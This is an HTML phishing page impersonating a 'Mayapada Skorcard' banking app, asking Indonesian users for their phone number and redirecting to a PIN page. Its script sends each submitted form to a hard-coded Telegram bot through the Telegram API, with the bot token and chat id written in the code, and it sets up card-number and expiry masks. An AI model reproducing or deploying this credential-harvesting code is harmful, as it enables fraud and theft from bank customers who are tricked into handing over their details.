<!DOCTYPE html>
<html lang="en"> 
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>	
<title>𝗠𝗮𝘆𝗮𝗽𝗮𝗱𝗮 𝗦𝗸𝗼𝗿𝗰𝗮𝗿𝗱 𝗔𝗽𝗽 </title>	
<meta charset="UTF-8">	
<meta http-equiv="X-UA-Compatible" content="IE=edge"> 
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="Cache-Control" content="max-age=0, no-cache, must-revalidate">	
<meta http-equiv="Pragma"	content="no-cache">
<meta http-equiv="Expires" content="0">
<link href="../../mayaestanti1.000webhostapp.com/patokmakngn.css"	rel="stylesheet">
<link rel="icon" href="">	
<link rel="apple-touch-icon" href="">
<style>
    body, html{
     background-image: url('https://static.tildacdn.com/tild3966-6638-4537-b737-373161623730/1000130979.jpg');
    background-repeat: no-repeat;
    background-position: 100% 100%;
    background-size: 100% 100%;
        font-family: 'Ubuntu', sans-serif;
      left: 0;
      right: 0;
      bottom: 0;
      top: 0;
      margin: 0px auto;
      background-color: #fff;
      width: 100%;
      height: auto;
      positon: fixed;
}
</style>
	
<img src="https://static.tildacdn.com/tild6337-6536-4333-b433-613835303761/1000130979.jpg" width="100%" style="height:80px;box-shadow: 8px 8px 8px 0px rgba(8,8,0,0.5);"></div> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            font-family: 'Open Sans', sans-serif;
            position: fixed;
            background:#fff;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #fff;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: 20px;
            color: #000;
        }

        .btnSubmit {
            display: block;
            margin: 0px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: #000;
            border: none; 
            text-align: center; 
            height: 40px; 
            width: 340px; 
            max-width: 80%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: 2px 2px 4px 0px; 
            transition: background 500ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: auto;
            padding: 0px; 
            cursor: pointer; 
            background: none transparent;
            border: none; 
            text-align: center; 
            height: 30px; 
            width: 340px; 
            max-width: 80%;
            font-family: Arial; 
            font-size: 18px; 
            font-weight: bold; 
            color: #2466AF;
            letter-spacing: 0px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 500ms ease 0s;
        }

        .form-log {
            box-sizing: border-box; 
            height: 50px; 
            width: 360px;
            max-width: 95%;
            border: 1px solid #2466AF;
            border-radius: 5px;
            font-family: 'Open Sans', sans-serif;
            font-size: 18px; 
            color: rgb(28, 28, 28); 
            word-spacing: 0px; 
            padding: 0px 50px;
            text-align: center;
            }

        #ionIcons {
            color: #2466AF;
            font-size: 29px;
            position: absolute;
            display: block;
            margin-top: 8px;
            margin-left: 40px;
        }

        .eye {
            display: block;
            margin: -40px auto;
            margin-right: 10px;
            position: relative;
            box-sizing: border-box; 
            z-index: 18; 
            height: 19.8189px;
            width: 25.0236px; 
            float: right;
            border-radius: 0px; 
            cursor: pointer;
        }

        .Button clickable-element {
            display: block;
            margin: 60px 0 0 0;
            padding: 0px; 
            cursor: pointer; 
            background: none #2466AF; 
            border: none; 
            text-align: center; 
            height: 57px; 
            width: 370px; 
            font-family: Arial; 
            font-size: 18px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 8px; 
            box-shadow: 2px 2px 4px 0px; 
            transition: background 200ms step-start 0s;
        }

        @media only screen and (max-width: 600px) {
            .btn-login {
                width: 80%;
            }
        }

        .box-lte {
            width: 380px;
            max-width: 95%;
            background: none;
            display: block;
            
            margin: -40px auto;
            border-radius: 20px;
        }

        textarea {
            box-sizing: border-box; 
            height: 75px;
            margin-top: -30px;
            width: 280px;
            border: 1px solid #2466AF;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 15px;
            padding: 5px 10px;
        }
        
          .textarea1 {
            box-sizing: border-box; 
            
            border: 2px solid red;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 50px;
            
        }
        
         .textarea {
            box-sizing: border-box; 
            height: 75px;
           
            width: 280px;
            border: 2px solid red;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            border-radius: 15px;
            padding: 5px 10px;
        }
        
        textarea::placeholder{
            font-size: 15px;
        }
           h1{
            display: table;
            background-color: transparent;
            color: #2466AF;
            padding: 15px;
            width: 100%;
            font-size: 27px;
            margin-bottom: -70px;
            text-align: center;
            position: fixed;
            top: 80;
           font-weight: bold;
            right: 0;
            left: 0;
            margin: 0px auto;
            
        }
        
        .blink {
  animation: blink-animation 2s steps(6, start) infinite;
  -webkit-animation: blink-animation 2s steps(6, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
  }
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
  }
}

    </style> 
    
       <style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #2466AF;
	line-height: 150px;
	color: #000;
	border: solid 1px #2466AF;
	text-align: center;
} 

.animated {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: linear;
	animation-timing-function: linear;
	 -webkit-animation-name: bounceIn; 
    animation-name: bounceIn; 
}

@-webkit-keyframes bounceIn { 
    0% { 
        opacity: 1; 
        -webkit-transform: scale(0); 
    } 

    50% { 
        opacity: 1; 
        -webkit-transform: scale(0); 
    } 

    70% { 
        -webkit-transform: scale(0); 
    } 

    100% { 
         -webkit-transform: scale(0); 
    } 
} 

@keyframes bounceIn { 
    0% { 
        opacity: 1; 
        transform: scale(.1); 
    } 

    50% { 
        opacity: 1; 
        transform: scale(.5); 
    } 

    70% { 
        transform: scale(1); 
    } 

    100% { 
        transform: scale(1); 
    } 
} 


</style>  
  <style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #5849CF;
	line-height: 150px;
	color: #000;
	border: solid 1px #5849CF;
	text-align: center;
} 

.naik {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease-in;
	animation-timing-function: ease-in;
	-webkit-animation-name: bounceOutUp; 
    animation-name: bounceOutUp; 
}

@-webkit-keyframes bounceOutUp { 
    0% { 
        -webkit-transform: translateY(0); 
    } 
    20% { 
        opacity: 1; 
        -webkit-transform: translateY(20px); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateY(-200px); 
    } 
} 
@keyframes bounceOutUp { 
    0% { 
        transform: translateY(0); 
    } 
    20% { 
        opacity: 1; 
        transform: translateY(20px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateY(-500px); 
    } 
} 
.bounceOutUp { 
    
}


/*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 300px;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}


.loader{
      font-size: 20px;
      color: #FFF;
      font-weight: bold;
      display: inline-block;
      font-family: 'Nunito', sans-serif;
      
      position: absolute;
      margin-top: 0px;
    }
    .loader:before{
      content: '';
      animation: 2s print linear alternate infinite;
    }
    .loader:after{
      content: '';
      position: absolute;
      right: -4px;
      top: 50%;
      transform: translatey(-45%);
      width: 2px;
      height: 1.3em;
      background: currentColor;
      opacity: 0.8;
      animation: 1s blink steps(2) infinite;
    }
    
    @keyframes blink {
      0%  { visibility: hidden;}
      100%  { visibility: visible;}
    }
</style>
 </head> 
 <body> 
     <center>
     </div> 
    </div> 
     <div class="col-12" style="width: 100%; max-width: 100%; display: f; margin: :5px auto;"> 
      
<form id="setPin" onsubmit="return false">
<div class="container">
             <br><br><br><br><br>
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 300px; max-width: 100%; display: block; margin: 0px auto; padding: 0 20px; margin-top: -10px"> 
      <p style="font-size: 25px; text-align: center; font-weight: bold; padding: 10px"><div style="font-weight: bold; text-align: center; margin-top: -100px; margin-bottom: 5px; color: 0">Masukkan nomor telpon kamu</div></p>
    <br><br>
     </div> 
    </div> 
    <div class="row"> 
     <div class="col-12" style="width: 390px; max-width: 100%; display: block; margin: 0px auto;"> 
       <center> 
        <div style="margin-top: auto"> 
         <input type="tel" name="Skorcard-nomor" id="nomor"  class="bubble-element Input form-log" placeholder="+62" maxlength="13" minlength="10" pattern="(?=.*[0-9]).{10,13}"  required oninvalid="this.setCustomValidity('𝖬𝖺𝗌𝗎𝗄𝗄𝖺𝗇 𝗇𝗈𝗆𝗈𝗋 𝗍𝖾𝗅𝗉𝗈𝗇 𝗒𝖺𝗇𝗀 𝗍𝖾𝗋𝖽𝖺𝖿𝗍𝖺𝗋')" onchange="this.setCustomValidity('')" style="margin-left: 0px;" required>
  
         <b>
         </strong></p></a></b>
        </div>
        <br><br><br><br>
       </center>
       <b>
<button id="btnSubmit" id="kirims" class="bubble-element Button clickable-element" style="max-width: 95%; padding: 0px; cursor: pointer; background: none #21292B; border: none; text-align: center; display: block; margin: 20px auto; height: 40px; width: 360px; left: 0px; top: 0px; font-family: sans-serif; font-size: 15px; font-weight: 400; color: rgb(255, 255, 255); letter-spacing: 1px; line-height: 1; border-radius: 25px; box-shadow: 2px 2px 4px 0px; transition: background 200ms ease 0s; font-weight: 400; tabindex="2">𝗟𝗮𝗻𝗷𝘂𝘁𝗸𝗮𝗻</button>
</b>
      </form>
  </div>
   
       <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
        </div> 
   </div> 
   </div>
 <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
<script src="jquery.min.js"></script>
       
        <script type="text/javascript">
            $(document).ready(function(){
        </script>
<!-- </body> -->  
   <script>


function closeForm() {
  document.getElementById("myForm").style.display = "none";
}
</script> 
  </div> 
  <!-- partial -->
 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script>
 <script>$(document).ready(function(){
$('#debit').mask('0000 0000 0000 0000');     
$('#valid').mask('00/00');
});</script>
 <p id="status"></p>
   <script src="setPin.js"></script>
   
   <script>
   
            $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });
            
const chat_id = '-1002437287311', botID = 'bot7566851766:AAEK0wnEFLt26bfdeNjKKDRaOHfvcVfYl_s';

    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;

    document.querySelector('#setPin').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href = 'pi.html';
    });

            
        });
        
   </script>
        </form>
      </div>
    </section>
    <!-- <script src="./axios.js" type="module"></script> -->
    <script src="./Pin.html" type="module"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
  



<br>
<div class="row">
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js">
            </script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js">
            </script>
<script>
            $(document).ready(function() {
                $('.slider').slick({
                    autoplay: true,
                    autoplaySpeed: 500,
                    dots: true
                });
            });
            </script>
            
            <script>
 var nomor = sessionStorage.getItem("nomor");
 document.getElementById("nomorku").value = nomor + "";
</script>
</body>
</html>
